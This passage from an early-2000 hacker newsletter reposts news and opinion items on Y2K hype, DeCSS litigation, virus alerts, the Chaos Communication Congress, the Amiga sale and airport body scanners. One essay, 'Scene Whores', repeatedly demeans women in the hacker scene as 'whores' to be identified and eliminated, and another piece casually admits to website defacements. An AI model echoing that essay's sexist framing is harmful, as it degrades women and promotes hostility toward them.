4. The code for "swap has a number of interesting features. In particular it displays in microcosm the problems of race conditions when several processes are running together....What happens next depends on the order in which process A and process B are reactivated. (Since they both have the same priority, "PSWP", it is a toss-up which goes first.)
Lions, J., 1977. p. 15-2, "A commentary on the UNIX operating system"

5. http://vapid.dhs.org/Library/bufferov.html

6. http://www.l0pht.com/slint.html

7. http://www.unixpower.org/security/

8. http://www.fas.org/irp/offdocs/pdd/index.html (#62 & #63)

@HWA

34.0 Gangly Mentality, the Y2K hype by ytcracker 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

A buffer overflow HNN original article.

Gangly Mentality

The story of the great Y2K swindle and what is to come.

by YTCracker(phed@felons.org)

The Setup

What do billions of dollars, billions of useless books, and billions of prophetic statements have in common?
If you guessed the infamous Y2K rollover, you are probably one of the millions of people who were informed of some global catastrophe set to take place the first of this year. There was not a paper in publication these last few years that didn't mention some sort of doomsday consequence related to our society's dependency on computers.

If you are any kind of normal human being you would have expected something interesting out of this entire fiasco. I expected something self-fulfilling. Mobs of fanatics and drunks taking to the streets with automatic weapons shouting verses out of the Bible, siphoning gas and stealing stereo equipment. The most eventful happenings in Denver and Colorado Springs were a few kids begging the cops to beat them. It was worse than that when the Broncos won the Super Bowl.

Digitally, I was surprised to see the overall lack of systems compromised. I expected Attrition to be flooded up to their necks in defacements. The staff had informed me that they were planning on keeping a pretty good monitor on things. Their major concern was cross-continental defacements that represented some anti-government motives. Sadly, there was no large-scale cyber-shootout. All was quiet in the land of the double-oh.

However, I don't think that we are out of the clear yet. A few issues still need to be addressed. Just because the infamous "Millennium Bug" turned out to be a farce[in a general sense] does not constitute a sigh of relief. Every threat that took place before the rollover is just as real. Every security issue unaddressed prior to the first is still something to reckon with. I would argue that we have introduced a whole breed of new problems that have absolutely nothing to do with something so trivial as a system date.

The History

There was a time when the Internet was occupied by a select few. In order to participate you required a little more than standard knowledge of a computer.
If you didn't have some kind of dialup account provided by your employer you were forced to shell out a great deal of money for a meager ten hours. This regulation provided a positive future for the Internet; a handful of knowledgeable people were constructing the fabric of the system while another handful of knowledgeable people were engaging in mastering it. The only browser that anyone used was NCSA Mosaic. Any application you used was from the Trumpet Software suite. All the files you ever wanted you obtained from Walnut Creek or the Washington Archives. This environment led to quick growth and a plethora of new frontiers. In recent times, manufacturers have made it incredibly easy to hop on the bandwagon and begin anew through your phone line. Granted, this is a great thing. The Internet is probably the single greatest invention of the twentieth century. It possesses an endless wealth of knowledge and power at your fingertips. These extremely positive qualities make it very hard to believe that there is a downside. An obvious issue is this recent obsession with the New Year. If another Melissa virus or Y2K-ish event emerges the media will overexpose it beyond its true threat. Many elements play into this exposure ranging from computers rapidly becoming a part of everyone's life to a reporter's burning urge to write a great story. What can we attribute this obsession to? Ignorance. As aforementioned, the Internet is no longer occupied by a majority of intelligent and computer-literate individuals. It is very simple to just hop online as a casual user and be taken advantage of. It is also easy for a fairly casual user to land a job in charge of the systems that govern your use of the Internet. Entrusting this kind of information into incapable hands is unnerving but it happens everyday. Bad people are out there, you know. The Dilemma We now have an equation that doesn't balance out. 
We have an extremely disproportioned Internet community that consists of ignorant masses that can be led by simple fear and heresy. On the other side of the fence we have that original handful[sizewise], some of which are running around like vigilantes for the good of the gangsters. The other piece of that pie is looking to ruin your life, take your credit card information, and load countless virii on your computer. It is very doubtful that something like this will happen to everyone[this is an extreme scenario], but you get the point. The broadcast ability that the Internet provides is a potential tool to instigate a nationwide scare. Imagine if a malicious user was to spam an authentic looking hoax proclaiming that a new generation of virus has infested itself in United States' vital computer systems and another country is extorting us. "By the way, I work for the Department of Energy. I'm not supposed to be releasing this. I am jeopardizing my job for the greater good here." It may be a little farfetched, however it's the principle that is important. Due to the media potentially telling an event such as this to the public with spokespeople "refusing to comment," we usher in an age where a simple rumor can affect an entire country in a very negative manner. Further banking off of the ignorance of the online community, people have authored worms cleverly disguised that are zipping around the world as you read this. The media tends to focus more on a scare tactic than an educative standpoint. This take on such events only breeds more ignorance and it discourages people from the truth of the matter. It is my fear that if you were to take a general poll of the streets asking fairly straightforward questions about the topics in this article you would get some pretty weird looks on people's faces. 
They would probably also tell you that they think "hackers" are the root of all evil and that they don't know much about the culture except that they "use viruses" and "fuck with people." Who is to blame? The Coverup One of the biggest misunderstandings of the general public is what really goes on behind the scenes. I will be the first to admit that the defacements that I have contributed to required little or no skill. While I may have capitalized on an existing vulnerability, the root of the problem is the same. You can code in as many languages as you want or be a total newbie and it is still just as easy to manipulate these vulnerabilities. If the general public knew how simple it was to actually compromise a server[excluding the hours/days/weeks to code and conceptualize, but to dotslash-hax0r], they would have a fit! Even more discouraging is the fact that such high profile sites fall victim to these attacks. This is what is depressing. Our so-called security experts have fallen to mere children fooling around after school. As regular Hackernews readers are probably informed, the state of the Internet is slowly deteriorating into a free-for-all. Which brings me to my next point, cyberterrorism. Most officials will attest that the United States is ready to defend against such attacks. However, at the current rate of growth concerning infrastructures and software chalking up the version numbers, staying on top of things these days is virtually impossible. A chain is only as strong as its weakest link, and I'll be damned if those webservers weren't some mighty weak links. Even though the majority of classified information is maintained through a SneakerNet[Nike or Reebok version 2.2 and higher], there are careless individuals who will leave sensitive data for the taking. The End Generally, people don't have much to fear. The army of computer-impaired will eventually find some way to evolve. 
I personally propose some sort of mandatory education concerning surfing practice and what exactly that big box that makes "clickity" noises really does. Perhaps then people will be a little more mature when their mouse disappears.

On the other hand, the governments of the world are frantically running around trying to save face. Reason? They don't want to be left behind. They know as well as we do that there are plenty more problems where the "Y2K Bug" came from. They are the ones that are going to be in charge of mediating the situations as they arise.

Time to panic? Not yet. Wait until 2028 when the seven-bit date blows[2^7=128]. Until then have a happy 19100.

YTCracker(phed@felons.org)
(c)2000 YTCracker and sevenonenine

@HWA

35.0 "Scene Whores" By Eric Parker/Mind Security 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

A buffer overflow HNN original article.

A well known, but overlooked threat to Hackers.

Scene Whores.

By: Erik Parker
Mind Security

Let me start off with a quick preface to give some explanation as to why I am writing this. First, this is going to seem like a very sexist article, as I will always refer to women as the scene whores, and use 'she' when speaking about scene whores. The reasoning behind this is, the majority of hackers are men. I did not go out and take a poll or anything, but I feel very safe in saying the majority of hackers are male. This paper may use examples that you might feel were written about you, or your situation, but the reason it seems like this, is because most confrontations with scene whores, are very much alike. I wanted to take Lance Spitzner's papers on "Know Your Enemy" and reword them to apply here, as script kiddies and scene whores are very much alike, they just use different common tools.

Now I know what you are thinking, that this article must be a joke, or that I must be writing it out of anger because of something that has happened to me.
Well yes I have first hand knowledge of the Scene whores, however I haven't been directly involved with one for a couple of years. This is spawning off of watching other relationships, and seeing many scene whores come and go, that have their reasons. If I had to speculate on why they do it, I would say a majority of them don't realize they are, that it is something in their subconscious making them do it. Whether it is for popularity in the "scene", or they think they will learn more by sleeping their way up the hacker ladder. This article is not a joke. They are a real threat. They waste our time, ruin friendships, cause chaos between hackers, and generally ruin periods of our life. A sure sign after being compromised by a scene whore, after they are done with you, is when you go to talk to friends you have neglected during the period of compromise, and they say "Welcome back, we missed you". However, what has to be figured out, is how to make there never be a period of time like that. Scene whores can be found in several places. I think a very common one is on IRC. Other places like 2600 meetings, Conventions (Like Defcon), and even meet them through your friends, who may have met them in the above mentioned ways. Some very unlucky guys get scene whores right from the start, when they first turn into it. The scene whore has decided that Hackers look glamorous, or they find out how large your salary is, compared to hers, her current boyfriend's, or even her parents' combined. We are a rare species I suppose, we are in an age where we wear what we want, we don't necessarily need a college background, we are making 6 digit figures, and setting the rules for ourselves. Any way you look at it, scene whores can look and think that we have power, money, and we are the stereotyped "cool". Some of us are all of the above, and into drugs, and many girls find drugs to be an attractive feature.
I don't have a lot of experience with scene whores and drug related things, as I went a different direction and stayed away from most of the drug scene. There is a very classic approach that is seen in most cases. This is an easy one to see coming, if you do a little history research about the possible scene whore before you get involved. The Ladder approach is what I like to call it. In most cases when dealing with a ladder, you start at the bottom and work your way up. Just like the scene whore does. They try to get networked into the scene by finding someone who knows something, or at the very least, knows someone who knows something. If they are good looking, or partially good looking and easy, they have no problems with this approach. There is one good thing to say about the majority, most of them learn something on the way. If nothing else, they usually learn what the internet is, how to IRC, how to login to NT, and maybe even how to work IRC under a non-windows platform. They will go with bottom rung hacker for a little while, and then once the scene whore has met enough of the hackers friends, or actually gets to be known a little bit, and meets a few people on their own, they find someone more interesting.. Someone who seems smarter, and has more friends, or has been in the media more, or has some noted accomplishments. Usually this person is a friend, or acquaintance of the first hacker. They move on, and this usually destroys the friend with the new target, and the old target, as well as with the scene whore, and the old target. One term scene whores should learn is, be nice to hackers on your way up, because you will be seeing them again on your way up again. Hopefully we can start identifying scene whores quicker, and securing ourselves against them quicker, and put them out of commission. In the above mentioned method, scene whores can make it up just a few guys, or make it along dozens of people. 
You can get a good idea of how many people scene whores sleep with by reading the Hacker Sex Chart. You will notice some scene whores with a dozen or more links on there. You will notice some very well known people on that list, and notice even they got sucked into the claws of a scene whore before. Scene whores who sleep around, and think that sex will gain them knowledge find out in the end that they are just worthless whores who had a good time, and probably picked up more diseases than knowledge. There are other methods.. Or lack thereof, that scene whores use. Some are not in it just to get to the top. Some are in it, just to meet as many people as they can, and have as much "fun" as they can. These are Good looking scene whores, to the nastiest of scene whores. There is always a hacker, or a perhaps a drunk hacker, that will do the nastiest of scene whore. These ones are even worse than the Ladder Climbers, as they usually tend to sleep with more people, have less commitments. Well, this depends. They aren't as bad as the ladder climbers in the way that they don't consume as much of the hackers precious time, and usually don't make people leave their friends. These girls do however tend to breakup more friendships than the ladder climbers, as they cover more ground. The friendships that were strong usually get repaired though, as they quickly realize she was a scene whore. These scene whores are usually detected a lot quicker than others. Then there are the extremely ignorant scene whores. The ones that make the other types look intelligent. These are the ones who watched the movie 'Hackers', and have only heard about the criminal side of hackers. They want to get into it for the feel of doing something bad. Thinking they will find a group of hackers that can get them millions from a bank, or do something so illegal that it turns them on. You know the types, the types of people who get excited at the thought of doing something naughty. 
Like having sex in a church during Sunday morning gatherings. These scene whores usually only end up finding stupid web site defacers, who introduce them selves as hackers, when they are really mistaken, and are just script kiddies and crackers. Sometimes these hackers actually do something illegal, and the scene whore finds it very erotic and loves it. A few weeks later the Cracker is arrested, and the scene whore testifies against them, and the cracker gets fined, spends time in jail, or ends up without their computer for years. Now the hard part is.. To determine which ones aren't scene whores. The ones who have been with other hackers, but are true and honest, and like you for who you are. I can't say the best way to determine this. I think it is easier to just try and detect the scene whores, and eliminate them, than to try and find a way to detect non-scene whores, if that makes any sense to you. There are cases where the non-scene whore had legitimate relationships with other hackers, and it just happens that you are the right person for them. The fact that you are a hacker has nothing to do with it. They aren't out for your money, for your friends, to be in the news papers, or to see you commit crimes on computers. There is a possibility I am looking at this all wrong, and of course most of this is based off of what I have seen, my thoughts and opinions. There are hackers who like scene whores, because they know it won't last, but it is like an adventure. However the hackers who like the scene whores usually leave time for their friends, and don't get swallowed up by them. However, these hackers help contribute to keeping scene whores around, and eventually the scene whores they let stick around, will end up ruining some other hackers life, or a period of it anyway. Last, I contemplated doing this article for some time. 
It is a controversial subject, especially because of what I mentioned in the preface, that it seems biased against women, and that it generally applies to them, and because of the number of men vs. the number of women that are real hackers, and because I have never seen a guy go around and sleep with as many hacker women as he could, I can't really put the article into that perspective. On another note, just to reiterate what I said in the start, this article is not about you, or anyone you know. It is not about anyone period. It is about the concept of scene whores, why they do it. I would have added in on how to stop them, but the only way to stop them is to identify them, and to control yourself. Think with your head, and not any other part of you. As well, if you do happen to get in with one, get health insurance, because it could do serious damage to your heart.

Thanks to the Proof Readers: Anonymous xs

@HWA

36.0 DVD Control Association Loses First Round 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Santa Clara County Superior Court Judge William Elfving has denied the DVD Copy Control Association's request for a restraining order against numerous web sites and individuals. The DVD CCA had hoped that the restraining order would prevent people from distributing DeCSS, a program written to allow the playing of DVD movies on regular computers and not DVD players. While the restraining order was denied, the war is not over yet. Trial has been scheduled for January 14, 2000. The EFF provided preliminary legal assistance in this case.
Associated Press - via Yahoo
http://dailynews.yahoo.com/h/ap/19991229/tc/dvd_copying_suit_3.html
Industry Standard - via Yahoo
http://dailynews.yahoo.com/h/is/19991229/bs/19991229242.html
Electronic Defense Foundation
http://www.eff.org/
HNN's copy of the legal complaint
http://www.hackernews.com/special/1999/dvdinjunction.html
DeCSS Defense Site
http://www.lemuria.org/DeCSS/
DVD Copy Control Association
http://www.dvdcca.org/dvdcca/index.html

@HWA

37.0 First Viruses of the New Year Discovered 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by The Ringo and turtlex

Computer Associates has announced the discovery of the first new virus/trojans of the new year. While some of the four pieces of code that have been discovered do contain destructive payloads none of the four are considered extremely dangerous. (Four? That's it? Where are the predicted 30,000 Y2K viruses?)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2415783,00.html?chkpt=zdhpnews01
Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/19991231/tc/yk_computerassociates_1.html

Say hello to Feliz.Trojan and Armagidon

CA spends weekend publicizing low-grade viruses. The latest two pack some punch, but appear little more virulent than WScript.Kak, Trojan.Kill.

By Robert Lemos, ZDNet News
UPDATED January 2, 2000 2:48 PM PT

It's already been a busy new year for virus watchers at Computer Associates International Inc., which used the weekend to issue the first virus warnings of the year 2000. CA (NYSE: CA) followed up two earlier warnings with two more on Sunday, issuing releases warning of Feliz.Trojan and Armagidon, a new Word macro virus. Both are potentially destructive. Feliz.Trojan can cause PCs not to boot, and Armagidon can cause documents to print with incorrect characters. Armagidon will also replace the Windows mouse pointer with a Red Cross symbol on May 8, which is Red Cross Day.
CA officials were not immediately available to assess the potential virulence of these new viruses. There was no mention of them on other virus sites. The other viruses CA issued warnings of were not considered very dangerous. On Saturday, CA released an alert that warned users of Wscript.Kak, a worm that spreads via systems that use both Microsoft Windows 98 and the Microsoft Outlook Express 5.0 e-mail client. A company official acknowledged that Wscript.Kak was not particularly virulent. "From a risk perspective, this is fairly low. You have to send an e-mail for it to spread," said Simon Perry, security business manager at CA in an interview with ZDNN on Saturday. "A self-propagating virus, like Melissa, will spread itself to several others automatically, and by the nature of the propagation you get a threat." While the Melissa macro virus, which struck thousands of companies last March, required the user to open an attachment, once that had occurred the virus spread exponentially. Like Melissa, Wscript.Kak does not appear to do any damage to systems, but merely spreads itself by attaching a copy of the virus onto every e-mail that a user sends. That makes it a potential nuisance, at worst. The systems of corporate and home users that have turned off scripting -- a recommended strategy after the appearance of BubbleBoy two months ago -- will not be infected. "Though this virus isn't Y2K-related, its discovery further confirms that hackers will exploit fears throughout the Y2K changeover," Perry had said in a press release issued Saturday. The statement seemed somewhat ironic, since the lack of a malicious payload or any mention of it by other anti-virus firms suggested that CA itself is capitalizing on those fears. Perry told ZDNN that a CA client found the worm, so that even though the virus has been classified as "low risk," the company believed publicizing it was the best course. 
Has potential to spread

One aspect of the worm that could lead to its spreading quickly is that users don't have to click on an attachment to trigger the malicious code. If a user's Internet Explorer security settings are set to low or medium, the worm will infect the system without any user action, said the company. The worm will then go on to change the signature settings of the user's mail to its own and then attach itself to every e-mail message the user subsequently sends. Users who have the Windows Scripting Host option turned off will not be susceptible to this, or any, scripting virus. After infecting the computer, the worm will shut down Windows. After the system reboots, the worm will be running in the background, waiting to infect every e-mail the user sends out. Otherwise, CA doesn't report any malicious payload in the virus.

Trojan.Kill more destructive

Earlier this week, CA reported another virus distributed through pirated copies of Windows 98 operating systems. The virus, known as Trojan.Kill, could wipe out information saved on computers when their dates roll past Jan. 1. "Since Trojan.Kill is directly related to Y2K and carries a destructive payload, we're concerned about the damage it can do," said Perry. "Obviously this virus is specifically targeted at illegal software, and Computer Associates strongly recommends that all software deployed either in the business environment or for home use is a legal copy," Perry said in a statement.

pread through traditional means such as e-mail, shared drives or floppy disks, Trojan.Kill hides behind a setup file called "Instalar.exe."

Reuters contributed to this report.

-=-

Reuters:

Friday December 31 7:34 PM ET

Computer Associates Warns of New Viruses

NEW YORK (Reuters) - Computer Associates International Inc. Friday warned of several computer viruses the company said were part of string of viruses timed to take advantage of fears about the changeover to the Year 2000.
The Lucky 2000 virus, which runs on Microsoft Windows 95, 98 and NT platforms, infects files that use the Visual Basic programming language, Computer Associates said. The virus wipes out the content of the file but does not change the name so a user will not know a file has been infected until it is run. Lucky 2000 sends users to a Russian Web site when they try to run infected files. The company also warned about the Esmeralda.807 virus, which causes a delay when a user opens a 32-bit Windows file, making it appear that the computer has temporarily frozen. The Spaces.1633 virus harms the start-up function of the computer. A separate virus, called Zelu.Trojan, has the potential to destroy all files on an infected machine while pretending to be the antidote to a Y2K bug. It arrives as an executable with the name Y2K.EXE.

``All computer users must take extra precautions during this virus onslaught,'' said Simon Perry, business manager of security at Computer Associates. ``We can't stress enough the importance of powerful and reliable antivirus software as virus writers continue to exploit user fears on the eve of Y2K.''

Computer Associates said further virus-related information is available at http://www.cai.com/virusinfo, and it said it is offering free downloads of antivirus software for personal use at http://antivirus.cai.com.

The company provides software, support and integration services, mostly to businesses. Shares of Computer Associates closed down 7/16 at 69-15/16 on Friday on the New York Stock Exchange.

@HWA

38.0 Reports from Chaos Computer Congress 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime

Steve Kettmann reports from Germany for Wired on the 16th annual Chaos Communication Congress. (There isn't much new in these reports if you have ever been to any con before.)
Wired - CCC Women Were Odd Men Out http://www.wired.com/news/culture/0,1284,33346,00.html Wired - Oh, How the CCC Has Evolved http://www.wired.com/news/culture/0,1284,33342,00.html CCC Women Were Odd Men Out by Steve Kettmann 9:35 a.m. 30.Dec.1999 PST BERLIN -- There was a lot of talk about family and community at this year's Chaos Computer Club annual congress. But a lot of women were wondering: Whose family? To call Chaos male-dominated is a vast understatement. And that didn't go down too well in some quarters. To mollify the women who were there, they were promised a "hack center" of their own. But the hordes of pasty-faced teens with monitors under their arms needed space, and they took over the room. An open confrontation ensued. "Some of them said they didn't think a women's room was necessary," said Nina Corda, an ISP hotline worker from Bremen who was a key organizer of the women's room. "They said, 'Just because you're a woman doesn't mean you get special treatment.'" Corda, a smiling woman who speaks fondly of her days street-fighting against neo-Nazis, was not about to sit still for that sort of talk. "We are marginalized in the CCC," she said. "Just take a look around." Corda appealed to the CCC leadership. The top logistical organizer for the conference, Tim Pritlove, finally relented and transformed it back to a women's room. Several women-only workshops were held, including one on Linux instruction in which about 25 attended. It was a victory in the sense that even though women comprised only about 10 percent of the total attendance, they still were a presence. "When I asked Tim, he said it didn't look like we were doing anything in the room, because we had only set up one computer," Corda said. "I said, 'Hacking isn't only about computers. It's a state of mind.' Technically, I'm not the strongest. For me it's more a political thing. "Hacking to me is about always wanting to know more, and not thinking that you already know it all." 
As a sort of compromise, this year's women room was not called a "women's room" but a "know-it-all free zone." "They were not that rare and exotic as last year, but it's still a small group," said CCC spokesman Andy Mueller-Maguhn. "I wouldn't say it's a problem. What's remarkable is not so much the number of women but their handling of computers and their handling of the situation. In my point of view, the women are starting to get really cool and really tough. They have a status of self-consciousness which is really remarkable. They say very loud and clear what they want." Interviews with women at the congress revealed a split. One group favored a more combative demand for inclusion. Another group believed more in jumping right in and making a longer-term bid for influence. "We will take over within 10 years," joked Nika Bertram, a member of the Kologne CCC. "You have to do things on your own," she said. "What cyber-feminism wants is to find its own way, and then talk to the men, and not hear, 'Your way is not the right way.' Maybe it's better not to have men telling you how to do things.' But it's actually a very open scene. The boys are very nice. We like them. No one ever said, 'There is the coffee machine.'" Kologne CCC member Christine Ketzer, who helped lead a workshop titled "Big Brother Is Watching," agrees. "Some women aren't interested in technology for technology," she said. "They are more interested in the social angle. It's really important for women to make themselves visible in the scene. It's very important to talk about the real serious topics and to become network administrators and things like that." Ketzer and Bertram both thought that the women they knew in the scene tended to shy away from speaking out and making their presence felt. Mueller-Maguhn made much the same point in explaining why more women were not scheduled to lead workshops. 
"Back in November, I sent out emails asking everyone who they wanted to hear, and there were no suggestions like that," he said. "I think it has to do with presenting yourself, and that is more of a man's domain." It was all disturbingly familiar to Rena Tangens and Barbara Thoens, the most famous women CCC veterans. Tangens attended her first CCC congress in 1988. "I was shocked," she said. "I was the only woman there. Well, there was one other woman there, but she was making cake. I decided I had to do the job myself. I led a workshop the next year on finding the advantages of different approaches to computers." Thoens soon joined in, and in the mid-90s served a two-year term as CCC president. The two women made a video making sport of how men explain technology. "They say, 'Let me do it,'" Thoens said, and both women laughed. But this year's fight over a women's room, one they thought they had settled years ago, left both feeling sad. "It's not fair," Tangens said. "It's just looking at the male view and ignoring everything else." Added Thoens: "The way of communicating between men is very loud and noisy, especially in the Berlin CCC. I like that, but some women don't. The men say the women have to shout, too, if they want to be heard. I always try to explain our concept and the men don't understand. I tell them 'It's good for you if there are a lot of women.' But the Berlin group would be happy if it was all men, just so long as you're seriously interested. "I think next year it will be really difficult again organizing the women's room." -=- Wired #2: Oh how CCC has evolved Oh, How the CCC Has Evolved by Steve Kettmann 9:35 a.m. 30.Dec.1999 PST BERLIN -- It says everything about how the Chaos Computer Club has evolved over its 16 years that Internet access kept disappearing at this week's annual congress, and the main reaction was easy-going jokes. 
The three-day congress was held in an old East Berlin official building called the Haus am Köllnischen Park, the former training school for East German party members. Technical limitations prompted CCC techies to opt for Web access via a radio hookup, and the results were repeated, hours-long interruptions. "The times the Internet doesn't work, we have more people in the workshops," CCC spokesman Frank Riegr observed. If it seems like there is no such thing as hacking without an Internet connection, well, time to update. To many at the congress, "hacking" meant anything from thinking creatively to questioning authority to getting a buzz going. The hacker persona has changed a lot since 1984, when CCC co-founder Steffen Wernery was organizing the first annual congress. "It was illegal to have a modem," he said. "You looked like a criminal if you had a computer and a phone connection. Now every computer has that." Lock-picking to us?: Once again, as at last summer's CCC-sponsored hacker camp outside of Berlin, the lock-picking workshops and competitions were a big hit. Tool kits were on sale, and practical information was abundant on how to use simple tools to make locks melt like butter. Lock-picking sport clubs have popped up all over Germany, spawned by the example of the Hamburg club, a spinoff of the CCC. But Wernery, the club president, said that of its 500 members, only 13 are CCC members. Membership really took off after last summer's camp. "Since the camp, we have a lot of international contacts," he said. "There are clubs now in France, Finland, the Netherlands." Next stop? America, of course. Wernery and his followers are trying to organize a trip to New York City for H2K, an American hacking gathering scheduled for 14-16 July. Last year's German lock-picking champion, Johannes Markmann, tried to capture the allure of what he and the others are spending so much time doing. "The idea is to break taboos," he said. 
"A taboo is only a taboo if you don't speak out about it. It is art, what we do." Added Wernery: "The only problem is the (lock-making) industry, which is selling such bad stuff." Game fever: There was some internal controversy over just what was being done on the hundreds of computers brought by congress attendees. Seems there's something of a videogame problem. Quake is more like a cult in CCC land. "It's a hack center, not a game center," said one typically outraged participant during the closing discussion session. "If we continue like this, the congress will be just a party under a tent in five years." Media blackout: If there was any consensus among CCC members, it concerned the media: Keeping them away was a good idea. The number of attending journalists has shrunk to about 30, down from 100 one year ago. "We did nothing to encourage journalists to come this year," Riegr said. "We wanted the congress to be more for the CCC family, and to give us a chance to think about what we are doing, and not to share that with the public." @HWA 39.0 Gateway Sells Amiga 01/03/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The old favorite Amiga has been sold once again. This time Gateway, the most recent owner of the Amiga name and technology, has sold it all to a company known as Amino Development Corp. Faithful Amiga users around the world had hoped that Gateway would revive the brand when they acquired it back in 1997. Evidently they will have to wait a little longer. However, since Amino is run by Bill McEwen, the former Amiga, Inc. marketing chief, they hopefully won't have to wait very long. Reuters - via ABC News http://abcnews.go.com/wire/US/reuters19991231_1089.html The UK Register http://www.theregister.co.uk/991231-000006.html Gateway Sells Rights to Amiga Name NEW YORK (Reuters) - Personal computer maker Gateway Inc. 
(GTW.N) signed a deal to sell its Amiga trademarks and computer systems to closely held Amino Development Corp., the companies said on Friday. Terms of the deal were not disclosed. Gateway senior vice president Peter Ashkin said in a statement the company elected to sell the Amiga name after deciding to wrap Amiga's software engineering function into Gateway's product development systems. San Diego-based Gateway, which acquired the rights to Amiga's technology in 1997, had been planning to revive the brand, prominent in the mid-1980s, for so-called information appliances and PCs. Gateway's shares closed at 70-1/8 on Thursday on the New York Stock Exchange.

-=-

Posted 31/12/1999 8:23pm by Tony Smith

Gateway sells Amiga to ex-Amiga employee

Gateway has finally rid itself of the legacy of its acquisition of Amiga with a close-of-year sale of the Amiga hardware spec., system software and brandname to Amino on undisclosed terms. And who do we find runs Amino? Step forward, Bill McEwen, the former Amiga, Inc. marketing chief who quit the company earlier this year just before ex-president Jim Collas was given the boot. McEwen is well respected by the Amiga community, so his acquisition of the Amiga is likely to be received positively -- doubly so since Gateway has long been viewed as the Amiga world's chief bete noire, responsible not only for giving Collas the push but for masterminding the software-only strategy pursued by his successor, Tom Schmidt, a move that for many Amiga users was a tacit admission that Gateway was never really interested in reviving the Amiga brand. In fact, it may well have been interested in doing just that but to use it as the basis for its own Internet appliance line. The snag here is the brand's poor level of recognition outside the community, and the company may have felt that a new brand, one not sullied by years in the IT wilderness, is probably more appropriate.
The work on the next-generation software technologies begun under Collas and continued under Schmidt will be folded into Gateway's own Net device product development operation, the company said. Not surprisingly, the deal doesn't include Amiga-related patents awarded since 1997 -- Gateway is hanging on to those. Given Gateway's lack of interest in the 'classic' Amiga, the sale should at least see its continued existence as a computer platform. As yet, Amino hasn't said what its plans for the classic Amiga are, but a move into the open source world seems a likely move. The Campaign to Open Source the Amiga (COSA), has been negotiating to open up the classic Amiga OS for some time, so far without success (though Schmidt did seem broadly receptive to the idea). COSA's argument is that the Amiga platform only has a future if it expands its user base, and the best way of doing that is to open it up in the hope of winning the same kind of broad support that Linux has achieved. Certainly, the influx of new talent that such a move would encourage if the Amiga platform isn't to dwindle further and become nothing more than a refuge for die-hards and 80s retro fans. ®

@HWA

40.0 CIH Author Hired by Taiwanese Company 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Yazmon

Wahoo International Enterprise Co has announced that it has succeeded in luring Chen Ing-hau away from rivals after the 24-year old completed his military service. Chen has admitted to writing and releasing the deadly CIH virus during his military tour. He was quickly arrested following his confession but was released due to lack of complaints brought against him.
Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/19991230/tc/virus_taiwan_1.html

Thursday December 30 12:13 AM ET

Taiwan Tech Firm Hires Chernobyl Virus Author

TAIPEI (Reuters) - A Taiwan technology firm keen to test its own hardware has hired the super-hacker who created the notorious Chernobyl virus -- which laid waste to hundreds of thousands of computers worldwide in April. Wahoo International Enterprise Co said it recently fought off a score of high-tech rivals competing to lure Chen Ing-hau after the 24-year-old completed Taiwan's mandatory military service. A remorseful Chen admitted he wrote the stealthy computer program during his tour of military duty, and was arrested in April but soon released because no complaints were filed in Taiwan. The virus, also known as CIH, wipes out an infected computer's hard drive data every April 26 -- the anniversary of the 1986 Soviet nuclear disaster at Chernobyl, Ukraine. Chen's rogue program hit hardest in countries with weak anti-virus defenses, gumming up hundreds of thousands of computers in South Korea, Turkey and China and thousands in India, Bangladesh, the Mideast and elsewhere. ``Our chairman felt he was a rare computer professional and we decided to accept him with an open heart,'' said Wahoo spokeswoman Vivi Wang. Chen works in Wahoo's hardware testing department, she said. Wahoo, which makes multilingual Linux operating systems, has said it plans to list its U.S. arm, XLinux.com, on the Nasdaq stock market by June 2000.

@HWA

41.0 Body-Scanners Used by US Customs 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

The US Customs Service has begun using new high-tech scanners that can see through the clothing of passengers and can search for contraband with an image that shows the naked body. As an alternative to a physical pat-down, frisk or strip search, suspected international smugglers are being offered the body scanner.
To insure privacy customs officials have said no image of the naked body is recorded or preserved. (Yet. Wait until 'body matching' can be done as easily as fingerprinting then they will start collecting data to compare new scans against.)

Boston Globe
http://www.boston.com/dailyglobe2/365/nation/Rights_backers_fight_scanner_that_gets_under_clothes+.shtml

Rights backers fight scanner that gets under clothes

Customs uses it to seek contraband

By Michael Arena
Newsday, 12/31/1999

NEW YORK - With airports bracing for Y2K problems and possible terrorism, the US Customs Service has begun using new high-tech scanners that can see through passengers' clothing and search for contraband with an image that shows the naked body.

International travelers who are suspected of smuggling drugs or carrying weapons are being offered the body scanner as an alternative to a physical pat-down or frisk when they pass through ports of entry at airports across the country.

The scanner can display hidden guns, knives, batteries, digital watches, explosive materials and packages of drugs secreted under clothing.

Supporters say scanners can help in the fight against terrorism and illegal drug importation. But privacy advocates say the technology's capability to show the full external contours of the body, including male and female private areas, is an ''electronic strip search'' that erodes constitutional protections and is more invasive than a frisk, which is performed while a suspect is fully clothed.

Customs Commissioner Raymond Kelly says the body scanners give travelers the choice of avoiding the physical contact of an external body search at the hands of an inspector.

''The option is that we can pat you physically,'' he said, ''or you can step in front of this machine. You don't have to do it.''

To insure privacy, no image is recorded or preserved, he said. And the scanner operator is always the same sex as the person under scan, said Kelly.

But Gregory T.
Nojeim, legislative counsel for the American Civil Liberties Union, has been fighting the technology since it was first proposed as a security enhancement three years ago after TWA Flight 800 exploded off Long Island.

He told an aviation safety conference shortly after the crash that ''the system has a joy-stick driven zoom option that allows the operator to enlarge portions of the image.''

The image is not in photographic detail, but it does provide a clear outline of the person's body.

